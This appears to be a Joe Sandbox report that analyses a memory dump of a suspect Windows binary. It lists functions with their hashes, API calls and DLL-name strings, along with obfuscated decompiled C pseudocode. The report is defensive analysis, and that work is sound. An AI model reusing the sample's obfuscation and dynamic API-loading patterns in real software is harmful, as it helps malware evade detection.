Instruction ID: 82353c21f5b02067731bad4e8c93e333ef13656db84ab0d16b50ba65e7675c29
Opcode Fuzzy Hash: ad3b46d283b7a1111ce81db4a5bc39104135c0e70693c4a7e7741c43ecff76a9
Instruction Fuzzy Hash: 5B91F176E042419FCB00DF79EC846E93BB2EF2A314B04417BD914D7766E2750969CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0046F1CB Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 134libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 0046F21A

Strings

msmpeg2adec.dll, xrefs: 0046F281
Tu', xrefs: 0046F302
scavengeui.dll, xrefs: 0046F2A8, 0046F32B
ehshell.dll, xrefs: 0046F3AD
RegQueryInfoKeyW, xrefs: 0046F397
yv, xrefs: 0046F2AD

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: RegQueryInfoKeyW$Tu'$ehshell.dll$msmpeg2adec.dll$scavengeui.dll$yv
API String ID: 190572456-1160503481
Opcode ID: db8660f263b84099112726461b433e88fe593eabb09464c5320bf16405da4f26
Instruction ID: ca49b3c234b8c2619f48e1edaf3f0ef58823f84217352afaaabc834776090ce2
Opcode Fuzzy Hash: db8660f263b84099112726461b433e88fe593eabb09464c5320bf16405da4f26
Instruction Fuzzy Hash: 82518C74E083459FC700DFB8E9D42E97BB2EF2A304B04407BD9419B322E2744958CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00498C2B Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00498DDB

Strings

manage-bde.exe, xrefs: 00498D14
ehshell.dll, xrefs: 00498DA9
6v), xrefs: 00498D19
scavengeui.dll, xrefs: 00498D63
ehshell.dll, xrefs: 00498CA4
msobjs.dll, xrefs: 00498D2A

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: 6v)$ehshell.dll$ehshell.dll$manage-bde.exe$msobjs.dll$scavengeui.dll
API String ID: 190572456-665889151
Opcode ID: ad8c9cd7a7bca3ac5f7649318bad39945f368612a2ba84bf5f261d8dc315de65
Instruction ID: 289dbacc44725dc4667505c4f5ac365faa3a1cc61054e0dcee80fb24a077f2e1
Opcode Fuzzy Hash: ad8c9cd7a7bca3ac5f7649318bad39945f368612a2ba84bf5f261d8dc315de65
Instruction Fuzzy Hash: B341B064E082859FCB00DF78F8942E97FB2EF2A314B48427BC94597362E2390555CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0049FB51 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0049FB51(void* __ebx, signed int __ecx, signed short __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t41;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t49;
				signed int _t51;
				int _t53;
				intOrPtr _t57;
				signed int _t60;
				void* _t64;
				signed int _t65;
				signed int _t70;
				signed int _t76;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t117;
				signed int _t133;
				intOrPtr _t139;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed short _t146;
				short _t147;
				intOrPtr _t148;
				void* _t155;
				signed int _t160;
				signed int _t165;
				void* _t167;
				void* _t168;

				_t162 = __esi;
				_t146 = __edx;
				_t133 = __ecx;
				_pop(_t41);
				 *(_t168 - 0x18) = _t41;
				 *(_t168 - 8) = _t41;
				L00460156(__ebx, __ecx, __edx, __edi, __esi);
				 *0x4fd1ee = _t146;
				_t44 =  *(_t168 - 8);
				if( *(_t168 - 0x18) == 0) {
					 *0x4fff1b = _t44;
					_t155 = __edi - 0xe2da;
					_t45 = _t44;
					 *0x4fff1e = _t45;
					if(_t155 >= 0) {
						 *(_t168 - 8) = _t133;
						_t133 =  !(_t133 + _t133 - 0x7584);
						_t146 = 0x9cf0;
						 *0x4fed1f =  *0x4fed1f - 0x9cf0;
						_t162 = __esi + 0xc45c;
						 *0x4fff1d = _t45;
						_t155 = 0xffffffffffffffff;
					}
					 *0x4fd553 = _t45;
					 *0x4fd67f = _t45;
					_t147 = _t146 - 0x95;
					 *0x4feba7 =  *0x4feba7 - _t147;
					_t46 =  *0x4fff19; // -107
					 *0x4fff1b =  *0x4fff1b - _t46;
					 *0x4fd6d3 =  *0x4fd6d3 + _t155;
					_t49 = _t45;
					 *(_t168 - 8) = _t49;
					 *0x4fd1cc = _t147;
					_t148 =  *0x4fd1fe; // 0xa5ad
					 *0x4fff19 =  *0x4fff19 - _t148;
					 *0x4fd24c =  *0x4fd24c + _t162;
					_t51 =  *(_t168 - 8);
					 *0x4fd050 =  *0x4fd050 - _t51;
					 *(_t168 - 8) = _t51;
					_t53 = CloseHandle( *(_t168 - 0x14));
					 *(_t168 - 8) = _t53;
					if((_t133 + 0x00000071 & 0x00007f2d) < 0) {
						 *0x4fff1d = 0xd1;
						_t57 = 0;
						 *0x4fd59f = 0;
						if(0 > 0x22) {
							_t57 =  *0x4fd9ab; // 0x0
						}
						 *0x4fff1e =  *0x4fff1e - _t57;
						 *0x4fd79f =  *0x4fd79f + 0x11dfb8;
					}
					return  *((intOrPtr*)(_t168 - 0x34));
				} else {
					 *0x4fd2d9 =  *0x4fd2d9 - __esi;
					_t165 = __esi & 0x00c3a88e;
					_t160 = __edi + 0xd1cd12;
					_t60 = _t44;
					 *(_t168 - 8) = _t60;
					_push( *(_t168 - 8));
					_push(_t160);
					_push(1);
					L004618BC( *(_t168 - 8) +  *(_t168 - 8), _t146);
					_t64 = 1;
					if(_t64 == 0xe96) {
					}
					_t139 =  *0x4fd178; // 0x718a
					_t140 = _t139 + 1;
					 *0x4fd1c4 = _t146;
					_t65 =  *(_t168 - 0x1c);
					 *0x4fff1e = _t65;
					 *0x4fff11 =  *0x4fff11 + _t65;
					if(_t65 >= 0x1e09a0) {
						 *0x4fdf7b = 0x3a52a8;
						_t145 = _t140 - 0x5dadf4;
						 *0x4fd19a = _t146;
						if((_t146 & 0x0079f6fc) != 0) {
							_t146 = _t146 + 0x881b81;
							 *0x4fd21c =  *0x4fd21c - _t165;
							 *0x4fff19 = _t65;
							 *0x4fff1d = _t65;
							_t160 = _t160 + _t160 - 0x2b076;
						}
						_t140 = _t145;
						 *0x4fd154 =  *0x4fd154 - _t140;
					}
					if(_t140 > _t140) {
						_t146 = _t146 + 0x8908;
						 *0x4fd204 = _t146;
					}
					 *0x4fff1b = _t65;
					_t167 = _t165 - 0xa55469 + _t160;
					 *(_t168 - 0x20) = _t65;
					 *0x4fd042 =  *0x4fd042 - _t65;
					_t110 = "imagesp1.dll" + _t65;
					 *(_t168 - 8) = _t65;
					if((_t146 & 0x007e922e) < 0) {
						L12:
						if(_t65 > 0x27ac) {
							 *0x4fff12 =  *0x4fff12 - _t110;
						}
						_t111 =  *0x4fdf3b; // 0x0
						 *0x4fd14a = _t140;
						_t140 = _t160;
						 *0x4fd0b8 =  *0x4fd0b8 + _t111;
						if(_t111 + _t111 > _t111 + _t111) {
							goto L15;
						}
					} else {
						if((_t146 & 0x0000a4c7) <= 0) {
							L15:
							_t140 = _t140 - 1;
						} else {
							 *0x4ff968 =  *0x4ff968 + _t167;
							 *0x4fff1d = 0xc8;
							_t65 = 0xc8;
							_t160 = _t160 - 0xda7f8b;
							 *0x4fd42b = 0xc8;
							goto L12;
						}
					}
					_t142 =  !_t140;
					 *0x4fd168 = _t142;
					_t70 =  *(_t168 - 8);
					 *(_t168 - 0x1c) = 0;
					 *0x4fff16 =  *0x4fff16 - _t142;
					 *0x4fd16e =  *0x4fd16e + _t142;
					 *(_t168 - 0xc) = _t70;
					 *0x4fff1b = _t70;
					 *0x4fd713 =  *0x4fd713 - _t160;
					 *(_t168 - 8) =  *(_t168 - 0xc);
					 *(_t168 - 0xc) = _t168 - 0x1c;
					_t76 =  *(_t168 - 0xc);
					_t117 =  *0x4fd8f7; // 0x2725
					 *0x4fdb4f =  *0x4fdb4f + _t117;
					_push(_t76);
					 *0x4fd200 =  *0x4fd200 - 0x8860;
					 *0x4fd21c =  *0x4fd21c + _t167;
					_push(1);
					_push(1);
					_push(0x49fdb9);
					_push(L0045F957);
					return _t76 + _t76;
				}
			}

0x0049fb51
0x0049fb51
0x0049fb51
0x0049fb51
0x0049fb52
0x0049fb55
0x0049fb5b
0x0049fb69
0x0049fb70
0x0049fb77
0x004a09ce
0x004a09d4
0x004a09d9
0x004a09da
0x004a09e2
0x004a09fd
0x004a0a08
0x004a0a14
0x004a0a18
0x004a0a20
0x004a0a25
0x004a0a2c
0x004a0a2c
0x004a0a2d
0x004a0a32
0x004a0a3f
0x004a0a42
0x004a0a4a
0x004a0a50
0x004a0a56
0x004a0a67
0x004a0a72
0x004a0a75
0x004a0a7c
0x004a0a83
0x004a0a89
0x004a0a92
0x004a0a9a
0x004a0aa4
0x004a0aad
0x004a0ab3
0x004a0abe
0x004a0ad4
0x004a0ad9
0x004a0ae1
0x004a0ae8
0x004a0aea
0x004a0afc
0x004a0b01
0x004a0b14
0x004a0b14
0x004a0b34
0x0049fb7d
0x0049fb7e
0x0049fb85
0x0049fb8b
0x0049fb91
0x0049fb9b
0x0049fbab
0x0049fbae
0x0049fbaf
0x0049fbb3
0x0049fbb8
0x0049fbbd
0x0049fbbd
0x0049fbce
0x0049fbd5
0x0049fbd6
0x0049fbe3
0x0049fbe6
0x0049fbf0
0x0049fbfb
0x0049fc05
0x0049fc0d
0x0049fc13
0x0049fc20
0x0049fc22
0x0049fc28
0x0049fc2f
0x0049fc44
0x0049fc4b
0x0049fc5e
0x0049fc73
0x0049fc75
0x0049fc75
0x0049fc7e
0x0049fc80
0x0049fc85
0x0049fc85
0x0049fc95
0x0049fc9b
0x0049fc9e
0x0049fcae
0x0049fcb5
0x0049fcb7
0x0049fcc0
0x0049fce7
0x0049fceb
0x0049fced
0x0049fced
0x0049fcf5
0x0049fcfb
0x0049fd05
0x0049fd19
0x0049fd25
0x00000000
0x00000000
0x0049fcc2
0x0049fcc7
0x0049fd27
0x0049fd27
0x0049fccb
0x0049fccd
0x0049fcd3
0x0049fcd8
0x0049fcda
0x0049fce0
0x00000000
0x0049fce0
0x0049fcc7
0x0049fd28
0x0049fd2a
0x0049fd3a
0x0049fd3d
0x0049fd49
0x0049fd4f
0x0049fd58
0x0049fd5b
0x0049fd67
0x0049fd77
0x0049fd82
0x0049fd88
0x0049fd8d
0x0049fd93
0x0049fd99
0x0049fd9a
0x0049fda1
0x0049fdaa
0x0049fdac
0x0049fdae
0x0049fdb3
0x0049fdb8
0x0049fdb8

APIs

CloseHandle.KERNEL32(?), ref: 004A0AAD

Strings

imagesp1.dll, xrefs: 0049FCA9
CreateActCtxW, xrefs: 0049FBBF
manage-bde.exe, xrefs: 004A09EA
MXEAgent.dll, xrefs: 004A0B25
KBDBGPH.DLL, xrefs: 004A0AEF
LogonUserExA, xrefs: 0049FC51
ehshell.dll, xrefs: 0049FC63

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CloseHandle
String ID: CreateActCtxW$KBDBGPH.DLL$LogonUserExA$MXEAgent.dll$ehshell.dll$imagesp1.dll$manage-bde.exe
API String ID: 2962429428-3026828488
Opcode ID: 6c5336f03160dde68fe4e7aa4b1500c8d9cef1ff4a32bcef07ff590a454dac3c
Instruction ID: b3ae5f3f906f321965bd958a701dab740caa4a47fef950c629b3f00b0af48582
Opcode Fuzzy Hash: 6c5336f03160dde68fe4e7aa4b1500c8d9cef1ff4a32bcef07ff590a454dac3c
Instruction Fuzzy Hash: 1AA1CFA5E043459FCB00DFB9E8846E97BB2EF2A314B04407BD958D3362E2780669CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0049F93F Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0049F93F(char __eax, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _t21;
				signed int _t22;
				char _t23;
				intOrPtr _t24;
				signed int _t27;
				signed int _t29;
				int _t31;
				intOrPtr _t35;
				intOrPtr _t41;
				signed int _t79;
				void* _t85;
				signed int _t86;
				signed int _t87;
				void* _t88;
				short _t89;
				intOrPtr _t90;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t104;
				void* _t107;

				_t104 = __esi;
				_t85 = __edx;
				_push(__eax);
				 *0x4fff1d = __eax;
				_t95 = __edi + __edi;
				if(__eax >= 0) {
				}
				_t86 = _t85 - _t104;
				_pop(_t21);
				 *0x4fd15a = 0x819a;
				_t79 = 0xffffffffff89e3cd;
				 *0x4fd1f4 = _t86;
				if((_t86 & 0x0092653b) < 0) {
					_t104 = _t104 - 0xb2ff;
				}
				_t96 = _t95 - 0xd2098f;
				 *(_t107 - 8) = _t21;
				_t87 =  *0x4fd1f4; // 0x724
				_t88 = _t87 - 0xab2f;
				_t22 =  *(_t107 - 8);
				if(_t22 == 1) {
					 *0x4fff1b = _t22;
					_t97 = _t96 - 0xe2da;
					_t23 = _t22;
					 *0x4fff1e = _t23;
					if(_t97 >= 0) {
						 *(_t107 - 8) = _t79;
						_t79 =  !(_t79 + _t79 - 0x7584);
						_t88 = 0x9cf0;
						 *0x4fed1f =  *0x4fed1f - 0x9cf0;
						_t104 = _t104 + 0xc45c;
						 *0x4fff1d = _t23;
						_t97 = 0xffffffffffffffff;
					}
					 *0x4fd553 = _t23;
					 *0x4fd67f = _t23;
					_t89 = _t88 - 0x95;
					 *0x4feba7 =  *0x4feba7 - _t89;
					_t24 =  *0x4fff19; // -107
					 *0x4fff1b =  *0x4fff1b - _t24;
					 *0x4fd6d3 =  *0x4fd6d3 + _t97;
					_t27 = _t23;
					 *(_t107 - 8) = _t27;
					 *0x4fd1cc = _t89;
					_t90 =  *0x4fd1fe; // 0xa5ad
					 *0x4fff19 =  *0x4fff19 - _t90;
					 *0x4fd24c =  *0x4fd24c + _t104;
					_t29 =  *(_t107 - 8);
					 *0x4fd050 =  *0x4fd050 - _t29;
					 *(_t107 - 8) = _t29;
					_t31 = CloseHandle( *(_t107 - 0x14));
					 *(_t107 - 8) = _t31;
					if((_t79 + 0x00000071 & 0x00007f2d) < 0) {
						 *0x4fff1d = 0xd1;
						_t35 = 0;
						 *0x4fd59f = 0;
						if(0 > 0x22) {
							_t35 =  *0x4fd9ab; // 0x0
						}
						 *0x4fff1e =  *0x4fff1e - _t35;
						 *0x4fd79f =  *0x4fd79f + 0x11dfb8;
					}
					return  *((intOrPtr*)(_t107 - 0x34));
				} else {
					 *((intOrPtr*)(_t107 - 0xc)) = GetLastError();
					_push( *((intOrPtr*)(_t107 - 0xc)));
					_t41 =  *0x4fff1e; // 0x3
					 *0x4fd4d3 = _t41;
					_push(0);
					_push(0);
					_push(0);
					_push(E0049FA11);
					_push(L0045F504);
					return _t41 - 0x20748c;
				}
			}

0x0049f93f
0x0049f93f
0x0049f93f
0x0049f940
0x0049f946
0x0049f94a
0x0049f94a
0x0049f96c
0x0049f96e
0x0049f974
0x0049f97d
0x0049f983
0x0049f990
0x0049f992
0x0049f999
0x0049f99b
0x0049f9a1
0x0049f9a4
0x0049f9ab
0x0049f9b0
0x0049f9bb
0x004a09ce
0x004a09d4
0x004a09d9
0x004a09da
0x004a09e2
0x004a09fd
0x004a0a08
0x004a0a14
0x004a0a18
0x004a0a20
0x004a0a25
0x004a0a2c
0x004a0a2c
0x004a0a2d
0x004a0a32
0x004a0a3f
0x004a0a42
0x004a0a4a
0x004a0a50
0x004a0a56
0x004a0a67
0x004a0a72
0x004a0a75
0x004a0a7c
0x004a0a83
0x004a0a89
0x004a0a92
0x004a0a9a
0x004a0aa4
0x004a0aad
0x004a0ab3
0x004a0abe
0x004a0ad4
0x004a0ad9
0x004a0ae1
0x004a0ae8
0x004a0aea
0x004a0afc
0x004a0b01
0x004a0b14
0x004a0b14
0x004a0b34
0x0049f9c1
0x0049f9c8
0x0049f9e9
0x0049f9f0
0x0049f9f6
0x0049fa02
0x0049fa04
0x0049fa05
0x0049fa06
0x0049fa0b
0x0049fa10
0x0049fa10

APIs

GetLastError.KERNEL32 ref: 0049F9C2

Strings

manage-bde.exe, xrefs: 004A09EA
MXEAgent.dll, xrefs: 004A0B25
KBDBGPH.DLL, xrefs: 004A0AEF
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 0049F9D0
mtxclu.dll, xrefs: 0049F9DB, 0049FA04, 0049FA05
Microsoft.Build.Engine.dll, xrefs: 0049F9B3

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: ErrorLast
String ID: KBDBGPH.DLL$MXEAgent.dll$Microsoft.Build.Engine.dll$api-ms-win-core-libraryloader-l1-1-0.dll$manage-bde.exe$mtxclu.dll
API String ID: 1452528299-776210185
Opcode ID: 1a78973d54b529b3618431e32eaa97b6d8ff801e18c743c8e6b4a68ef17ab84b
Instruction ID: 4c8b451d1c9b2284b009edc73083ed36678d3f3eb5b703a32df562216bf1eb33
Opcode Fuzzy Hash: 1a78973d54b529b3618431e32eaa97b6d8ff801e18c743c8e6b4a68ef17ab84b
Instruction Fuzzy Hash: 7F510465E043459FC700DFB9FC846E97FB2EB69314700407BD908D7326E6780969CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0046664C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 246libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 004667CF

Strings

%+, xrefs: 00466933
@hqt, xrefs: 00466838
ehshell.dll, xrefs: 004669D0, 004669E9, 004669EA
RegQueryInfoKeyW, xrefs: 004666D4, 004667D8
RegQueryInfoKeyW, xrefs: 004666FD

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: @hqt$RegQueryInfoKeyW$RegQueryInfoKeyW$ehshell.dll$%+
API String ID: 190572456-2660715646
Opcode ID: 2e08bd9a7d766d1e68890cd6c2d18dddb802e5270c2c4f8c2ea3413460ef1ee1
Instruction ID: d4d0e9d8d4639fa0bd2e2998e05fc4740f85a7f48a137ebf44e0b3e2bd9103a2
Opcode Fuzzy Hash: 2e08bd9a7d766d1e68890cd6c2d18dddb802e5270c2c4f8c2ea3413460ef1ee1
Instruction Fuzzy Hash: A191E175E042059FCB00EFB9E8946E97BB2EF2A314F04407FC84997322E2790959CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004CCCDE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004CCCDE() {
				char _t23;
				char _t24;
				char _t26;
				void* _t27;
				int _t30;
				void* _t33;
				char _t37;
				char _t44;
				intOrPtr _t53;
				char _t59;
				short _t79;
				signed short _t92;
				short _t94;
				signed int _t106;
				unsigned short _t108;
				unsigned short _t109;
				void* _t110;
				unsigned short _t111;
				void* _t112;
				void* _t116;

				_push(ds);
				 *_t106 =  *_t106 - 1;
				_t23 =  *((intOrPtr*)(_t116 - 8));
				if("msmpeg2adec.dll" < 0x2cc1) {
					L3:
					_t92 = _t92 + 0xa39b;
					L4:
					 *((intOrPtr*)(_t116 - 0x18)) = _t23;
					_t111 = _t110 + 0xd46a;
					 *((intOrPtr*)(_t116 - 8)) = _t23;
					if((_t92 & 0x00008cdc) < 0) {
						_t92 =  *0x4fd212; // 0xaa6e
						 *0x4fff19 = _t23;
						 *0x4fff1b = _t23;
						_t111 = _t111 - 0xbdf982;
						 *0x4fd723 =  *0x4fd723 + _t106;
						_t44 =  *0x4fff1e; // 0x3
						_t106 = _t106 - 0x2cc02;
						 *0x4fff10 =  *0x4fff10 + _t44;
					}
					_t24 =  *((intOrPtr*)(_t116 - 8));
					_t84 = 0xc376;
					 *((intOrPtr*)(_t116 - 0xc)) = _t24;
					 *0x4fff1d = _t24;
					_t26 =  *((intOrPtr*)(_t116 - 0xc));
					if( *((intOrPtr*)(_t116 - 0x18)) == 0) {
						_t94 =  *0x4fd20a; // 0x178
						_t27 = _t26;
						_push( *((intOrPtr*)(_t116 - 0x14)));
						_t108 = (_t106 ^ 0x00d185d2) - 0xdfaa56;
						 *0x4fd503 = _t27;
						 *0x4fd1da = _t94;
						_t30 = InternetCloseHandle(_t27);
						 *0x4fd6ff =  *0x4fd6ff - _t108;
						_t53 = _t30 + _t30;
						_t112 = _t111 + 0xb4d7a7;
						 *0x4fff1d =  *0x4fff1d - _t30;
						_t109 = _t108 >> 0x186ed;
						_t33 = _t30;
						 *0x4fd1f4 = 0x937d;
						if(_t33 == 0x2327d6) {
							_t53 = 0x385e9c;
							 *0x4fddff = 0x385e9c;
						}
						_push(_t33);
						 *0x4fd20a = 0x126fa;
						E004B66B8(_t33, _t53, 0x186ed - 0x5bb9e7, 0x126fa, _t109, _t112 + _t112, 1);
						_push( *((intOrPtr*)(_t116 - 0x10)));
						_push(0x4ce58f);
						goto ( *0x4fe9ff);
					} else {
						_t59 =  *0x4fff1b; // 0x0
						L00460156(_t59, 0xc376, _t92 + 0xa9, _t106, _t111);
						_t37 = _t26;
						if(_t111 <= 0) {
							L10:
							_t111 = _t111 >> _t84;
							L11:
							 *0x4fff1d = _t37;
							 *((intOrPtr*)(_t116 - 0x2c)) = 4;
							 *0x4fd158 = _t84;
							 *((intOrPtr*)(_t116 - 8)) = _t37;
							_t26 = _t116 - 0x2c;
							 *((intOrPtr*)(_t116 - 8)) =  *((intOrPtr*)(_t116 - 8));
							_t84 =  *0x4fd18a; // 0x6341
							 *0x4fd1ee = 0x8a24;
							 *0x4fff1b = _t26;
							 *((intOrPtr*)(_t116 - 8)) = _t26;
							_push(1);
							_push(_t111 - 0xb29681);
							_push(0x4cce95);
							_t111 = E0049C91C;
							goto __esi;
						}
						 *0x4fff1e = _t37;
						_t106 = _t106 + _t106;
						if(_t37 >= 0x1a) {
							goto L11;
						}
						 *0x4fde57 = "ehshell.dll";
						_t84 = 0x5e7edc;
						goto L10;
					}
				}
				if(0x364811 >= 0x364811) {
					goto L4;
				}
				 *0x4fd10c = _t79;
				_t79 =  *0x4fd13c; // 0x7699
				goto L3;
			}

0x004cccde
0x004cccdf
0x004ccce4
0x004cccf1
0x004ccd0d
0x004ccd10
0x004ccd15
0x004ccd1d
0x004ccd20
0x004ccd25
0x004ccd37
0x004ccd3c
0x004ccd43
0x004ccd49
0x004ccd4f
0x004ccd57
0x004ccd73
0x004ccd79
0x004ccd7f
0x004ccd89
0x004ccd97
0x004ccd9a
0x004ccd9c
0x004ccd9f
0x004ccda6
0x004ccdad
0x004ce4c8
0x004ce4d5
0x004ce4d6
0x004ce4e0
0x004ce4e6
0x004ce4ef
0x004ce4ff
0x004ce50e
0x004ce515
0x004ce51a
0x004ce520
0x004ce526
0x004ce531
0x004ce536
0x004ce545
0x004ce547
0x004ce54c
0x004ce54c
0x004ce55a
0x004ce55b
0x004ce566
0x004ce576
0x004ce57e
0x004ce589
0x004ccdb3
0x004ccdb5
0x004ccdbf
0x004ccdc4
0x004ccdc8
0x004cce00
0x004cce0c
0x004cce0f
0x004cce1b
0x004cce20
0x004cce2a
0x004cce3a
0x004cce5b
0x004cce5e
0x004cce61
0x004cce6c
0x004cce7b
0x004cce83
0x004cce86
0x004cce88
0x004cce89
0x004cce8e
0x004cce93
0x004cce93
0x004ccdd2
0x004ccdd7
0x004ccde0
0x00000000
0x00000000
0x004ccdef
0x004ccdfe
0x00000000
0x004ccdfe
0x004ccdad
0x004cccfa
0x00000000
0x00000000
0x004cccfc
0x004ccd03
0x00000000

Strings

mssip32.dll, xrefs: 004CCD61
msmpeg2adec.dll, xrefs: 004CCCE7
ehshell.dll, xrefs: 004CCDEA
KBDBGPH.DLL, xrefs: 004CCD89
EhStorAuthn.exe, xrefs: 004CCE4D

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: EhStorAuthn.exe$KBDBGPH.DLL$ehshell.dll$msmpeg2adec.dll$mssip32.dll
API String ID: 0-3989804375
Opcode ID: 4dbd00b224a368df94d0325215b79ed799a8767db4ba373298da6375f1d1e1e5
Instruction ID: 4206cdb8113a6dbd4f4a7c5e502ba87944ac022a024b255d3357bc85fa688777
Opcode Fuzzy Hash: 4dbd00b224a368df94d0325215b79ed799a8767db4ba373298da6375f1d1e1e5
Instruction Fuzzy Hash: 6D51C376E442419FC7009F78FC847E83BB2EB2A310B48417BD95997366D2790919CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004AB29E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 004AB2F4

Strings

imagesp1.dll, xrefs: 004AB3DF
:$, xrefs: 004AB46D
sqlsrv32.dll, xrefs: 004AB395
ehshell.dll, xrefs: 004AB316
deskperf.dll, xrefs: 004AB41F

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: DirectorySystem
String ID: deskperf.dll$ehshell.dll$imagesp1.dll$sqlsrv32.dll$:$
API String ID: 2188284642-973223861
Opcode ID: a112d736ffbcee20f40d8a17949ad22db0b0f1d0e3122b51a856616129d3deed
Instruction ID: 96320473ab2cb3d2a8209a3446e308d1ce97c5b297357228a34b49d4d8a6771c
Opcode Fuzzy Hash: a112d736ffbcee20f40d8a17949ad22db0b0f1d0e3122b51a856616129d3deed
Instruction Fuzzy Hash: 1241D264E546458FCB00DFB9E8946E93BB2EB3A314F04817BD944D7362E3380665CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004A2B7F Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 127COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(-0000BD38,?,00000023,00000001), ref: 004A2D06

Strings

msmpeg2adec.dll, xrefs: 004A2D0F
manage-bde.exe, xrefs: 004A2BF9
deskperf.dll, xrefs: 004A2BE8, 004A2D31
EhStorAuthn.exe, xrefs: 004A2B9C
RegQueryInfoKeyW, xrefs: 004A2CB4

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: FolderPathSpecial
String ID: EhStorAuthn.exe$RegQueryInfoKeyW$deskperf.dll$manage-bde.exe$msmpeg2adec.dll
API String ID: 994120019-437616311
Opcode ID: 61357daddb09c9f652dfa771964420a3b26498940302535b9310cbf00db4704d
Instruction ID: c7e12ea071472de0c32b352597c1ffbb2c5eb8e18ca565ba47396de1921cb222
Opcode Fuzzy Hash: 61357daddb09c9f652dfa771964420a3b26498940302535b9310cbf00db4704d
Instruction Fuzzy Hash: 91417F75E00305ABCB00DFB9D9C46DDBBB2FF2E320B44417ADA44A7351E2790A54C758

Uniqueness

Uniqueness Score: -1.00%

Function 004F40FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 004F41B6

Strings

psapi.dll, xrefs: 004F4166
TpWaitForAlpcCompletion, xrefs: 004F41F6
RegQueryInfoKeyW, xrefs: 004F41C3, 004F4217
disrvpp.dll, xrefs: 004F41E1
yv, xrefs: 004F4101

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: FreeLibrary
String ID: RegQueryInfoKeyW$TpWaitForAlpcCompletion$disrvpp.dll$psapi.dll$yv
API String ID: 3664257935-2705667730
Opcode ID: 159ffbfe9b682b29a4c54c8f8221ec29c080c74c0a7d55dac2b89f85a897385c
Instruction ID: b59181c4af3a61a1aa3ccf3f56a68e6f34f0cb852217ae6ad1f8899945c27aad
Opcode Fuzzy Hash: 159ffbfe9b682b29a4c54c8f8221ec29c080c74c0a7d55dac2b89f85a897385c
Instruction Fuzzy Hash: 08415E75E442099FCB00DFB8E9946EEBBF1EB19314F00807AD948E7321E7789A55CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004AF6AC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 92COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 004AF78D

Strings

CreateActCtxW, xrefs: 004AF7D3
KBDBGPH.DLL, xrefs: 004AF75E
CoRevokeInitializeSpy, xrefs: 004AF725
iV, xrefs: 004AF76C
`Nqt, xrefs: 004AF78D

